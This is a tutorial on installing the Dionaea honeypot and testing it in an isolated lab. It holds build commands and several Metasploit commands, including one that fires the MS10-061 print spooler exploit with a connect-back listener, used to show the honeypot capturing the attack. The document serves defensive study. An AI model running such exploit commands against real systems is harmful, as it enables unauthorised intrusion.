Dionaea – A Malware Capturing Honeypot
Introduction to Dionaea
Dionaea “the Nepenthes successor” is a malware capturing honeypot initially developed under The Honeynet Project's 2009 Google Summer of Code (GSoC). Dionaea aims to trap malware exploiting vulnerabilities exposed by services offered over a network, and ultimately obtain a copy of the malware.
Dionaea features a modular architecture, embedding Python as its scripting language in order to emulate protocols. Much superior to its predecessor (Nepenthes), it is able to detect shellcodes using LibEmu and supports IPv6 and TLS.
Security of Dionaea
Like any other software, Dionaea is likely to contain exploitable bugs. To minimise the impact, Dionaea runs in a restricted environment without administrative privileges.
Protocols Dionaea Traps Malware From
Server Message Block (SMB) – SMB is the main protocol offered by Dionaea. SMB has a decent history of remote exploitable bugs and is a very popular target for worms.
Hypertext Transfer Protocol (HTTP) – Dionaea supports HTTP on port 80 as well as HTTPS. A self-signed SSL certificate is created at startup for HTTPS.
File Transfer Protocol (FTP) – Dionaea provides a basic FTP server on port 21. It allows the creation of directories and uploading and downloading of files.
Trivial File Transfer Protocol (TFTP) – Dionaea provides a TFTP server on port 60 which can be used to serve files.
Microsoft SQL Server (MSSQL) – Dionaea implements the Tabular Data Stream protocol which is used by Microsoft SQL Server. Listening to TCP/1433 and allowing clients to log in, it can decode queries run on the database.
Voice over IP (VoIP) – Developed as part of GSoC 2011 by PhiBo, the VoIP protocol used in Dionaea is the Session Initial Protocol (SIP). This module does not connect to an external VoIP registrar/server; it simply waits for incoming SIP messages, logs all data as incidents and/or binary data dumps, and reacts accordingly.
Dionaea uses LibEmu to detect and evaluate payloads sent by attackers in order to obtain a copy of the malware.
LibEmu is used to detect, measure, and if necessary, execute the shellcode. Shellcode measurement/profiling is performed by executing the shellcode in LibEmu VM and recording API calls and arguments. This is sufficient for profiling most shellcodes; but not for multi-stage shellcodes. In addition to recording API calls and arguments, we need to allow shellcodes to take actions (e.g. creating a network connection)
Once we obtained the payload and its profile, we have to act upon it in order to acquire a copy of the malware. Following are some common techniques used by attackers, and how Dionaea act upon them:
Shell Binding / Connect Back, Exec – Dionaea offers shell emulation for payload that offers a shell to the attacker (usually via port binding or connecting back to the attacker).
URLDownToFile API –Again, Dionaea offers shell emulation and acts upon shellcodes that use URLDownloadToFile API call to retrieve files via HTTP and execute retrieved files afterwards.
Multi-Stage Payloads – We’ll never know what to expect from the subsequent stage; LibEmu is used to execute the shellcode in the LibEmu VM.
To keep things simple, Dionaea offers the service to write information/logs to text files. However, similar to any other services, logging to text files is not a scalable solution.
In addition to that, Dionaea uses a communication system that is much superior to text logging known as incidents. Incidents, containing information about the origin and properties of an “attack”, are passed using incident handlers (iHandle). The LogSQL Python script is an iHandler what writes interesting incidents to an SQLite database. One advantage of using incidents logging is the ability to cluster information based on the initial attack when retrieving data from the database.
On top of local logging system, Dionaea can also be configured to send log streams to an XMPP server.
Once you’ve obtained a copy of malware, you have the option to either store the binaries locally or submit the file to some external tools or services (e.g. CWSandbox, Norman Sandbox, VirusTotal, Anubis, etc.) for further analysis.
Setting Up a Dionaea Honeypot
I set up my Dionaea honeypot on my Ubuntu 12:04.4 LTS machine.
I install all dependencies in /opt/dionaea.
apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
cd /opt/ git clone git://git.carnivore.it/dionaea.git dionaea
cd /opt/ git clone git://git.carnivore.it/liblcfg.git liblcfg cd liblcfg/code ./configure --prefix=/opt/dionaea make install
cd /opt/ git clone git://git.carnivore.it/libemu.git libemu cd libemu autoreconf –vi ./configure --prefix=/opt/dionaea make install
cd /opt/ wget http://dist.schmorp.de/libev/Attic/libev-4.04.tar.gz tar –xvzf libev-4.04.tar.gz cd libev-4.04 ./configure --prefix=/opt/dionaea make install
cd /opt/ wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz tar –xvzf libpcap-1.1.1.tar.gz cd libpcap-1.1.1 ./configure --prefix=/opt/dionaea make && make install
Install Python 3.2.2
cd /opt/ wget http://www.python.org/ftp/python/3.2.2/Python-3.2.2.tgz tar –xvzf Python-3.2.2.tgz cd Python-3.2.2 ./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS=”Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/” make && make install
cd /opt/ wget http://cython.org/release/Cython-0.16.tar.gz tar –xvzf Cython-0.16.tar.gz cd Cython-0.16 /opt/dionaea/bin/python3 setup.py install
cd /opt/dionaea autoreconf –vi ./configure \ --with-lcfg-include=/opt/dionaea/include/ \ --with-lcfg-lib=/opt/dionaea/lib/ \ --with-python=/opt/dionaea/bin/python3.2 \ --with-cython-dir=/opt/dionaea/bin \ --with-udns-include=/opt/dionaea/include/ \ --with-udns-lib=/opt/dionaea/lib/ \ --with-emu-include=/opt/dionaea/include/ \ --with-emu-lib=/opt/dionaea/lib/ \ --with-gc-include=/usr/include/gc \ --with-ev-include=/opt/dionaea/include \ --with-ev-lib=/opt/dionaea/lib \ --with-nl-include=/opt/dionaea/include \ --with-nl-lib=/opt/dionaea/lib/ \ --with-curl-config=/usr/bin/ \ --with-pcap-include=/opt/dionaea/include \ --with-pcap-lib=/opt/dionaea/lib/
make && make install
Test If Your Installation Works
Before you put your Dionaea honeypot live on the network, you need to configure it to your environment and preference. Dionaea configuration file – dionaea.conf – is located at directory /opt/dionaea/etc/dionaea/.
Dionaea In Action
Before we get all excited and start attacking the newly set up Dionaea honeypot, first let’s set up an isolated network.
I’ve my Dionaea setup on my Ubuntu 12.04.4 LTS machine (IP Address: 192.168.1.2), and a Debian Jessie box (IP Address 192.168.1.12) setup as my attacking machine with Metasploit and Nmap as my attacking tool.
With my isolated network setup, let’s get Dionaea up and running!
/opt/dionaea/bin/dionaea –r /opt/dionaea
Capturing Reconnaissance Operations
I’d performed reconnaissance using Nmap. You should be able to see Dionaea “providing” all sort of services. On the other end of the network, you should be able to see Dionaea picking up some traffics.
Capturing SIP Options Scan
Performing a more specific type of scan – SIP Options Scan – using Metasploit.
/opt/metasploit/msf3/msfcli auxiliary/scanner/sip/options CHOST=192.168.1.12 CPORT=5066 RHOST=192.168.1.2 RPORT=5060 E
Look into your Dionaea text log file, located at /opt/dionaea/var/log/dionaea.log, you will be able to investigate connection traffics and look for possible attack indicators.
Looking at Dionaea verbose text log can be a pain. Alternatively, you can view attacking traffics as incidents by querying the LogSQL SQLite database.
Using the ReadLogSQLTree Python script provided, we can view attacking traffics as incidents.
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Information logged in each incident includes the exploited vulnerability, time, attacker, information about shellcodes, and files offered for download.
Capturing MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
We’ve seen how Dionaea reacts to service scanning. Let’s see how it fair when we include shellcodes in our attack.
Knowing that Dionaea emulates SMB service to trap malware, let’s exploit a remote code execution vulnerability that can be found in Print Spooler Service on Microsoft Windows systems (MS10-061).
/opt/metasploit/msf3/msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.1.2 EXITFUNC=process LHOST=192.168.1.12 LPORT=4444 E
Dionaea captured and offered binaries for further analysis. These captured/downloaded binaries are available in /opt/dionaea/var/dionaea/binaries.
VMware Network Isolation for a Malware Analysis Lab, Lenny Zelster. Aug 15, 2011.
Dioanea Emulates MS10-061, Markus Koetter. Sep 26, 2010.
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution, Microsoft Knowledge Base.
Microsoft Print Spooler Service Impersonation Vulnerability, Rapid7 Vulnerability & Exploit Database.
Emil Tan, Chapter Lead, The Honeynet Project, Singapore Chapter